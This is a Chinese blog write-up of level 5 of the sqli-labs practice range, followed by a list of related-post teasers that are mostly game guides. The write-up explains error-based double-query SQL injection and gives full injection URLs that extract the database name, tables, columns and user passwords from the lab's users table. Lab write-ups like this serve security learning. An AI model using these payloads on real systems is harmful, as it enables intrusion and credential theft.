sql-lab 第五關

阿新 • • 發佈：2020-10-11

哎呦呦，到第五關了，天真的我以為，還與前幾關一樣的思路。

傻傻的來了一波盲注，都不成功。害，還是看了一手大佬的wp

還真不一樣，看這個題目都不一樣，Double Injection（雙查詢注入）。

我們先來了解一手二次查詢，說白了就是select巢狀查詢嘛，一個select裡面又巢狀著另一個查詢。巢狀的這個語句稱作子查詢。例如

select concat((select database()));

解釋一下，這個語句，先執行內部的再執行外面的。也就是說先執行一下select database(),然後再執行外面的這塊兒。

再搞第五關這個注入之前，我們還需要熟悉幾個函式：

1.count()彙總資料函式;

2.rand()隨機輸出一個大於0小於1的整數；

3 group by語句：也就是給你查詢出來的結果分組；

4 floor()取整

5 連線兩條語句

好，說那麼多，我們還是在題目裡找問題吧

開始注入，爆出資料庫：

http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20%20union%20select%20null,count(*),concat((select%20database()),floor(rand()*2))%20as%20a%20from%20information_schema.tables%20group%20by%20a--+

我第一次爆的時候不知是何原因沒顯示出來。等到我第三重新整理的時候就出來了。

接下來就要爆表名了：

http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

這是第一張表，接下來我們爆第二張

http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%201,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

第三張表：

http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%202,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

第四張表：

http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%203,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

開始爆列名：

http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27limit%2012,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

第二列：

http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27limit%2013,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

這樣就爆出來了。

最後就是資料了，開始爆：

http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20username%20from%20users%20limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

這是第一個，接下來第二個密碼

http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20password%20from%20users%20limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

終於全部都出來了。

再注入的時候，沒出來結果千萬不要急，一定要多試幾次，多重新整理重新整理，不要慌，爆的時候，畢竟需要緩衝時間的嘛。多重新整理重新整理。

sql-lab 第五關

哎呦呦，到第五關了，天真的我以為，還與前幾關一樣的思路。傻傻的來了一波盲注，都不成功。害，還是看了一手大佬的wp

SQL注入之二次注入（sql-lab第24關）

什麼是二次注入二次注入可以理解為，攻擊者構造的惡意資料儲存在資料庫後，惡意資料被讀取並進入到SQL查詢語句所導致的注入。防禦者可能在使用者輸入惡意資料時對其中的特殊字元進行了轉義處理，但在惡意資

《原神攻略》2.0機關棋譚第五關怎麼玩？機關棋譚2.0第五關永凍流玩法分享

原神2.0機關棋譚第五關怎麼玩？近期遊戲2.0版本的機關棋譚已經正式上線了，很多小夥伴可能還不清楚怎麼玩吧，今天小編給大家帶來原神機關棋譚2.0第五關永凍流玩法分享，快來看一下吧。

《原神攻略》2.0機關棋譚第五關掛機怎麼玩？稻妻機關棋譚第五關掛機玩法介紹

原神2.0機關棋譚第五關掛機怎麼玩？在機關棋譚中我們可以佈置一些機關他讓他們自己攻擊，今天小編給大家帶來原神稻妻機關棋譚第五關掛機玩法介紹，快來看一下吧。

《原神攻略》機關棋譚第五關雙燕來永凍打法參考

《原神》的機關棋譚活動類似塔防的玩法，可以選擇永凍流來阻止漏怪。下面請看由“靈蝶2233”帶來的《原神》機關棋譚第五關雙燕來永凍打法參考，一起來看看吧。

《原神攻略》幻影心流第五關怎麼玩？幻影心流第五天玩法分享

原神幻影心流第五關怎麼玩？近期遊戲正式開啟了幻影心流第五關的挑戰，很多小夥伴可能還不清楚怎麼玩吧，今天小編給大家帶來原神幻影心流第五天玩法分享，快來看一下吧。

《原神攻略》謎境懸兵第五關詳細打法解析

《原神》謎境懸兵第五關與第四關一同解鎖，那麼第五關要怎麼打，應該選擇哪些式札與符術，請看下面由“七月的休”帶來的《原神》謎境懸兵第五關詳細打法解析，一起來看看吧。

《原神攻略》祕境懸兵第五關怎麼打？祕境懸兵第五關打法心得

原神祕境懸兵第五關怎麼打？祕境懸兵第五關難度極高，很多玩家都不知道該怎麼打，下面小編就帶來原神祕境懸兵第五關打法心得，一起來看看吧。

無燼試練第一關到第五關打法

第一關到第三關打法第一關到第三關第四關打法（按順序，第一張就是打第一關，第二張是打第二關）

天蠻王——蒼木千葉到森羅永珍第五關打法

蒼木千葉打法第一關到第四關沒有火夢的話，可以換別的火系森羅永珍打法第一關到第五關這個也是，換別的草系

《原神攻略》振晶的研究第五關滿獎勵攻略

《原神》振晶的研究第五天活動內容已經解鎖，今天的關卡該如何用試玩角色獲取全部獎勵呢，下面請看“阿怪ii”帶來的《原神》振晶的研究第五關滿獎勵攻略，希望能夠幫助大家。

Table API 和 Flink SQL—第五章函式（Functions）

Flink Table 和 SQL 內建了很多 SQL 中支援的函式；如果有無法滿足的需要，則可以實現使用者自定義的函式（UDF）來解決。

第五章 SQL語句

一、sql語句的語義 DDL：Data Definition Language#資料定義語言（create、alter） DCL：Data Control Language#資料控制語言（grant、revoke、commit、rollback）

六步學會mybatis---------第五章：動態sql

1.if標籤 <select id=\"selPersons\" parameterType=\"Map\" resultMap=\"PersonResultMap\"> SELECT * FROM person where 1=1

sqli-labs靶場第十五關

第十五關沒什麼特殊的，只是單引號閉合而已。

7.SQL必知必會第五課使用函式處理資料

技術標籤：sql必知必會mysql 一、知識這裡的函式和一般意義的函式基本是等價的，給出相應的引數，獲得相應的輸出。由於函式這個話題太大，筆者由於水平問題，僅僅羅列出常用函式。

4.SQL必知必會第五課高階過濾資料

技術標籤：sql必知必會mysql 一、知識 1.or & and 簡單的或與邏輯詞，這裡舉一例分析之。我們想抓取供貨商為DLL01或者BRS01且價格高於9的資料。

Sqli-labs 第2關 SQL注入 Writeup

Sqli-labs 第2關 SQL注入 Writeup 關卡簡介關卡提示：GET-Error based - Intiger based 注入位置：GET

Sqli-labs 第3關 SQL注入 Writeup

Sqli-labs 第3關 SQL注入 Writeup 關卡簡介關卡提示：GET -Error based- Single quotes with twist- string

第五篇 SQL注入基礎知識

1 什麼是SQL注入一種將SQL語句插入到使用者輸入的引數中，進行攻擊，這些會通過後端伺服器傳入到SQL伺服器，執行對應的SQL語句，比如可以獲取資料庫資訊、使用者資訊、管理員許可權等

sql-lab 第五關

相關推薦